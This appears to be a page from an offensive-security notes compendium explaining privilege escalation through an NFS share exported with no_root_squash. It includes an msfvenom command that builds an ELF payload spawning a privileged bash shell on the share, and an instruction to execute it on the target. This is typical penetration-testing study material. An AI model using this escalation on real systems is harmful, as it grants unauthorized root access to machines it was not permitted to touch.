killchain-compendium/Post Exploitation/NFS Root Squash.md

NFS NO ROOT SQUASH

Mount NFS locally and gain root through activated no_root_squash.

When "no_root_squash" is enabled on an NFS share, it means that the "root" user from the client system retains its full privileges when interacting with files on the NFS share. In other words, any actions performed by the "root" user on the client system are replicated with full permissions on the NFS server. This can potentially lead to a security vulnerability, especially if the client system is compromised or maliciously manipulated.

Exploit

Craft a Shell

Craft a shell and execute it on the NFS share which has no_root_squash enabled to gain root privilege.

msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

After the shell has been created on or copied to the share, execute it on the target share

./shell.elf -p